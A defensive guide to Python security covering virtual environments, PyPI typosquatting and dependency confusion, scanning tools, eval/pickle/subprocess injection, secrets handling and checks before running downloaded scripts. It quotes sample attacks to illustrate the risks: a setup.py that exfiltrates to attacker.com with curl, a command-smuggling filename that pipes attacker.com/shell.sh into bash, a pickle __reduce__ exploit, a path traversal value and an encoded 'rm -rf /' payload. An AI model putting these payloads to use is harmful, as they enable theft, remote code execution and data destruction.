Python is everywhere — scripting, automation, security tooling, data pipelines, web backends. That ubiquity comes with an attack surface that is easy to underestimate. Python’s design philosophy (batteries included, dynamic, flexible) creates categories of risk that simply do not exist in stricter languages.

This guide covers two scenarios: the risks you face when writing Python code, and the risks you face when downloading and running scripts or packages someone else wrote. Both matter, and the failure modes are different.

TL;DR

  • Always use virtual environments — but understand that venv is not a sandbox: malicious code inside a venv can still read files, make network calls, and access your secrets
  • PyPI has no pre-publication malware scanning — typosquatting, dependency confusion, and maintainer takeovers are active attack vectors
  • Use guarddog before installing unknown packages, pip-audit for CVE scanning, and bandit for your own code
  • eval(), exec(), pickle, and subprocess with user input are injection vulnerabilities, not just bad practice
  • Secrets in source code get committed, pushed, and leaked — use environment variables or a secrets manager
  • Before running any downloaded script: read it, check its imports, and verify the package name character by character

Part 1: The Environment — Isolation Before Anything Else

Virtual Environments Are a Security Boundary, Not Just Convenience

Most Python developers know venvs prevent dependency conflicts. Fewer think of them as a security control — but they are.

What happens without a venv:

Terminal window
# No venv — pip installs globally, as your user or as root
pip install requests
# Now requests (and anything it pulls in) has access to your system Python
# and potentially to site-packages shared across all your projects

The problems this creates:

  1. Cross-project contamination — a malicious package installed for Project A is available to Project B. Venvs break this: each environment is isolated.

  2. Privilege escalation via system Python — if you habitually run sudo pip install, you’re installing third-party code with root privileges. Any malicious package that runs code at install time (via setup.py or PEP 517 hooks) executes as root.

  3. No clean uninstall path — without venvs, you cannot reliably remove a package and all its side effects. A compromised environment can be nuked and recreated; a contaminated system Python is harder to clean.

Always use a venv:

Terminal window
# Create and activate
python -m venv .venv
source .venv/bin/activate # Linux/macOS
.venv\Scripts\activate # Windows
# Install inside the venv only
pip install requests
# Deactivate when done
deactivate

Modern projects should use pyproject.toml with a tool like uv or poetry that enforces isolation automatically. The point is the same: code you did not write runs in a contained environment where damage is limited.

Venv Is Not a Sandbox

This is the most common misconception about virtual environments: a venv does not restrict what code can do at the OS level.

A malicious package installed inside a venv can still:

  • Read any file your user account can read — including ~/.ssh/, ~/.aws/credentials, browser cookie databases
  • Make outbound network connections to exfiltrate data
  • Spawn subprocesses (subprocess, os.system)
  • Read environment variables — including AWS_SECRET_ACCESS_KEY, DATABASE_URL, any secret you have set in your shell
  • Write or delete files anywhere your user has write access
  • Access other venvs on the same machine

The venv boundary is a Python module namespace boundary, not an OS-level isolation boundary. It prevents package conflicts between projects. It does not prevent malicious code from running.

For actual isolation when running untrusted code, use Docker with restricted permissions:

Terminal window
# No network, no access to home directory, read-only filesystem except /tmp
docker run --rm \
--network none \
--read-only \
--tmpfs /tmp \
-v $(pwd)/suspicious_script.py:/script.py:ro \
python:3.12-slim python /script.py

This is the difference: venv protects your project dependencies from each other. Docker (or a VM) protects your system from untrusted code.

The --user Flag Is Not a Safe Alternative

pip install --user installs to ~/.local/lib/python3.x/site-packages. This avoids root, but:

  • It shares across all projects for that user
  • It is included in sys.path by default, meaning a malicious package installed --user can still affect all your Python processes
  • It still runs setup.py and build hooks with your full user privileges

Use venvs. --user is a compromise, not a solution.


Part 2: Package Security — What PyPI Won’t Catch for You

PyPI Has No Pre-Publication Malware Scanning

Anyone with a PyPI account can publish a package. There is no review process, no sandbox execution of install hooks before publication. PyPI does conduct post-hoc malware scanning and removes packages when discovered — but the window between publication and removal can be hours or days.

During that window, automated systems (CI/CD pipelines, Docker builds, developer laptops) may already have installed the package.

Typosquatting — One Character Away

Attackers register package names that are visually similar to popular packages:

LegitimateTyposquatted
requestsrequest / requestss / requuests
numpynunpy / nummpy / numpy-base
PillowPil / pillow-python
boto3bot03 (zero not O) / boto
pycryptopy-crypto / pycrypt0

The malicious package usually works as expected — it installs the real library as a dependency and adds its own malicious code on top. The victim sees no errors.

How to protect yourself:

Terminal window
# Always verify the exact package name on pypi.org before installing
# Check: publication date, download count, maintainer history
# Use pip-audit to scan installed packages for known vulnerabilities
pip install pip-audit
pip-audit
# Use our own gate-cli for supply chain risk scoring
pip install gate-cli
gate scan requests numpy pandas

Dependency Confusion

If your internal package registry serves packages by name, and a package with that name also exists on PyPI, pip may fetch the PyPI version instead of your internal one — especially if the PyPI version has a higher version number.

Attackers register public PyPI packages with names that match internal corporate package names. When a developer or CI pipeline runs pip install, they get the attacker’s package.

Mitigation:

# pip.conf — explicitly scope internal packages to your private registry
[global]
index-url = https://your-internal-registry/simple/
extra-index-url = https://pypi.org/simple/
# Better: use --no-index for packages that should only come from internal sources
pip install --no-index --find-links=./vendor/ internal-package

setup.py and Build Hook Execution at Install Time

When you run pip install somepackage, pip may execute setup.py or PEP 517 build hooks — before you have reviewed any code. This is arbitrary code execution by design.

# A malicious setup.py — runs at pip install time
from setuptools import setup
import subprocess
# This executes during `pip install`
subprocess.run(["curl", "https://attacker.com/exfil?host=$(hostname)", "-s"],
capture_output=True)
setup(name="totally-legitimate-package", ...)

For untrusted packages: use pip install --no-build-isolation combined with reviewing source first, or use pip download to fetch the wheel without installing, then inspect before installing.

Pinning Dependencies — Version Locking Is a Security Control

Floating dependencies (requests>=2.0) will install whatever is current at the time. If a package is later compromised (maintainer account takeover, malicious release), your next pip install or Docker build fetches the compromised version.

Terminal window
# Bad — installs whatever is latest
requests>=2.28.0
# Better — pins exact version
requests==2.31.0
# Best — pins version AND hash
# Generate with:
pip-compile --generate-hashes requirements.in

Hash pinning means pip refuses to install a package whose content does not match the recorded hash — even if the version number is the same. It makes supply chain substitution attacks significantly harder.


Part 3: Scanning Tools — What to Use and When

No single tool catches everything. The tooling landscape splits into three distinct categories that solve different problems — use all three.

Category 1: Vulnerability Scanners (Known CVEs)

These check whether your installed packages have known, published vulnerabilities. They are fast, reliable, and catch the easy stuff — but they are useless against a new malicious package that has no CVE yet.

pip-audit — the current standard, maintained by PyPA (the Python Packaging Authority):

Terminal window
pip install pip-audit
# Scan current environment
pip-audit
# Scan a requirements file without installing
pip-audit -r requirements.txt
# Output as JSON for CI
pip-audit --format json -o audit-results.json

Safety — uses the PyPI Safety DB, good second opinion:

Terminal window
pip install safety
safety check
safety check -r requirements.txt

Snyk — commercial with a free tier, strongest CI/CD integration, pulls from multiple vulnerability databases including its own:

Terminal window
npm install -g snyk # yes, installed via npm
snyk auth
snyk test --file=requirements.txt

Snyk’s advantage: it tracks transitive dependencies (dependencies of dependencies) and can suggest upgrade paths that fix multiple issues at once. It also monitors your project continuously and alerts when new CVEs are published against your locked versions.

Trivy — broad scanner (containers, filesystems, repos), useful when Python is one part of a larger stack:

Terminal window
# Scan a directory containing requirements.txt or Pipfile.lock
trivy fs .
# Scan a Docker image that contains Python packages
trivy image my-python-app:latest

Category 2: Malicious Package Detectors (Behavioral Analysis)

These look for suspicious patterns in package code — network calls in setup.py, obfuscated strings, credential-harvesting patterns, unusual file system access. This is what catches typosquats and supply chain attacks that have no CVE.

guarddog (Datadog) — the strongest open source tool in this category:

Terminal window
pip install guarddog
# Scan before installing — downloads and inspects without executing
guarddog pypi verify requests
guarddog pypi verify numpy==1.24.0
# Scan a requirements file
guarddog pypi verify -r requirements.txt

guarddog checks for: setup.py network calls, cmd execution at install time, obfuscated code (base64 + exec patterns), credential file access, reverse shell patterns, and more. It inspects the package source without running it.

gate-cli — our own supply chain scanner, covers quarantine window risk (newly published packages with few downloads are statistically more likely to be malicious):

Terminal window
pip install gate-cli
gate scan requests numpy pandas
gate scan -r requirements.txt

gate focuses on signals that CVE scanners miss: publication recency, maintainer reputation, download velocity anomalies, and install-hook presence.

What these tools cannot do: detect a package that installs cleanly and only activates malicious behavior at runtime under specific conditions (e.g., when AWS_PROFILE is set, or when run on a CI server). That class of attack requires behavioral monitoring at runtime.

Category 3: Static Analysis for Your Own Code

These scan code you wrote for security vulnerabilities — injection risks, hardcoded secrets, insecure function use. They do not scan third-party packages.

Bandit — Python-specific, catches the issues covered in Part 4 of this article:

Terminal window
pip install bandit
# Scan a file or directory
bandit -r myproject/
# High severity only
bandit -r myproject/ -l -i
# Output as JSON for CI
bandit -r myproject/ -f json -o bandit-report.json

Bandit flags: eval() and exec() calls, subprocess with shell=True, pickle usage, hardcoded passwords, weak cryptography, SQL injection patterns, and more. False positive rate is low enough for CI enforcement.

Semgrep — more powerful, supports custom rules, good for team-wide enforcement:

Terminal window
pip install semgrep
# Run with the Python security ruleset
semgrep --config=p/python-security .
# Run the OWASP Top 10 ruleset
semgrep --config=p/owasp-top-ten .

Semgrep’s advantage: you can write custom rules for your codebase. If your project has a pattern that should never appear (e.g., direct SQL string concatenation), write a rule for it once and it becomes part of every developer’s pre-commit check.

StageToolWhat it catches
Before pip installguarddog pypi verifyMalicious packages, behavioral patterns
After install / in CIpip-auditKnown CVEs in dependencies
In CI (deeper)snyk testCVEs + transitive deps + upgrade paths
Pre-commit / CIbanditSecurity issues in your own code
Pre-commit / CIsemgrepCustom rules + OWASP patterns
Container buildstrivy imageFull stack: OS packages + Python

For production projects, run at minimum pip-audit + bandit in CI. Add guarddog for any project that installs packages dynamically or from less-known sources. Snyk is worth the free-tier signup for projects with complex dependency trees.


Part 4: Code You Write — The Python Injection Landscape

eval() and exec() — Injection by Design

eval() executes any Python expression. exec() executes any Python statement. If either receives user-controlled input, you have arbitrary code execution.

# Vulnerable — user can pass: "__import__('os').system('rm -rf ~')"
user_input = input("Enter a formula: ")
result = eval(user_input)
# Vulnerable exec — user can define and run anything
exec(user_input)

There is no safe way to sandbox eval() or exec() with user input in standard CPython. The __builtins__ restriction approach has been bypassed repeatedly.

The fix: don’t use them on user input. Use ast.literal_eval() if you need to parse Python literals (strings, numbers, lists, dicts) — it raises ValueError on anything that is not a literal value.

import ast
# Safe — only evaluates literals, raises ValueError on code
data = ast.literal_eval(user_input)

pickle — Deserialization Is Code Execution

Python’s pickle module serializes and deserializes Python objects. Deserializing a pickle payload executes Python code — the object’s __reduce__ method runs during loading.

import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ("whoami",))
# This executes os.system("whoami") on the machine that loads it
payload = pickle.dumps(Exploit())
# On the victim's machine:
pickle.loads(payload) # ← arbitrary code execution

Never unpickle data from untrusted sources. This includes: files uploaded by users, data from external APIs, inter-service messages if the sender is not fully trusted.

Safe alternatives:

  • json — for data exchange (no code execution risk)
  • msgpack — for binary serialization
  • protobuf — for typed inter-service communication
# Instead of pickle for data exchange:
import json
data = json.dumps(my_object)
restored = json.loads(data)

subprocess — Shell Injection

subprocess.run() with shell=True passes the command to /bin/sh — if any part of the command includes user input, you have shell injection.

# Vulnerable — user input is "filename; curl attacker.com/shell.sh | bash"
filename = request.args.get("file")
subprocess.run(f"cat {filename}", shell=True)
# Safe — pass as list, no shell interpolation
subprocess.run(["cat", filename], shell=False)

Rule: never use shell=True with any variable content. Pass arguments as a list. subprocess with a list does not invoke a shell — each element is passed as a literal argument to the executable.

Path Traversal

File operations with user-supplied paths can reach outside the intended directory:

# Vulnerable — user passes "../../etc/passwd"
filename = request.args.get("file")
with open(f"/var/data/uploads/{filename}") as f:
return f.read()

Fix: resolve the final path and verify it is still inside the intended root:

from pathlib import Path
BASE_DIR = Path("/var/data/uploads").resolve()
requested = (BASE_DIR / filename).resolve()
if not requested.is_relative_to(BASE_DIR):
raise PermissionError("Path traversal attempt")
with open(requested) as f:
return f.read()

Part 4: Secrets — The Leak That Keeps on Leaking

Hardcoded Credentials Are a Permanent Vulnerability

Secrets committed to source code get into git history. Even if you remove them in the next commit, they exist in every clone made before that commit — and in the history that git log reveals.

# This is in your git history forever
API_KEY = "sk-live-xxxxxxxxxxxxxxxxxxx"
DB_PASSWORD = "SuperSecret123!"

The fix: environment variables or a secrets manager, never source code.

import os
# Load from environment
API_KEY = os.environ["API_KEY"]
DB_PASSWORD = os.environ["DB_PASSWORD"]
# Or use python-dotenv for development (never commit the .env file)
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("API_KEY")
Terminal window
# .gitignore — add before first commit
.env
*.env
.env.local
secrets.json

If you have already committed a secret: rotate it immediately. Removing it from the current commit does not help — the secret is in history and in every existing clone.

Pre-commit scanning:

Terminal window
# Install detect-secrets to catch secrets before they hit the repo
pip install detect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baseline

Part 5: Before You Run a Downloaded Script

Downloaded scripts (from GitHub, gists, blog posts, Reddit) deserve a read-through before execution. The checklist:

1. Check the imports

# Red flags in a script claiming to be a "system cleaner"
import subprocess
import socket
import base64
import os

Any script that imports socket, subprocess, and base64 together without a clear reason is suspicious. Network + shell execution + encoding is a common malware pattern.

2. Look for obfuscation

# Red flags — obfuscated payload
exec(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# Decode it before running anything
import base64
print(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# → b'import os; os.system("rm -rf /")'

3. Run in a disposable environment

For any script you are not fully confident about, run it in a Docker container or VM with no access to your credentials, home directory, or network:

Terminal window
# Disposable container — script cannot reach your files or credentials
docker run --rm --network none -v $(pwd)/script.py:/script.py python:3.12-slim python /script.py

4. Verify package names character by character

Before pip install anything-from-a-blog-post: go to pypi.org/project/anything-from-a-blog-post and verify:

  • The package exists
  • The publication date is not from yesterday with 3 downloads
  • The maintainer has a history
  • The description matches what was advertised

Quick Reference Checklist

AreaWhat to do
EnvironmentsAlways use venv; never sudo pip install
Venv ≠ sandboxVenv isolates modules, not OS access — use Docker for real isolation
DependenciesPin versions; use hash verification for production
Package namesVerify on pypi.org before installing; check character by character
Install hooksKnow that setup.py runs at install time — use guarddog first
Scanning: maliciousguarddog pypi verify <package> before installing unknowns
Scanning: CVEspip-audit in CI; Snyk for transitive dependency tracking
Scanning: your codebandit + semgrep in CI or pre-commit
eval / execNever on user input; use ast.literal_eval for literals
pickleNever deserialize untrusted data
subprocessNever shell=True with variable content; pass as list
Path operationsResolve and validate paths stay within intended root
SecretsEnvironment variables only; .gitignore your .env; rotate anything committed
Downloaded scriptsRead before running; check imports; run in Docker with --network none


Sources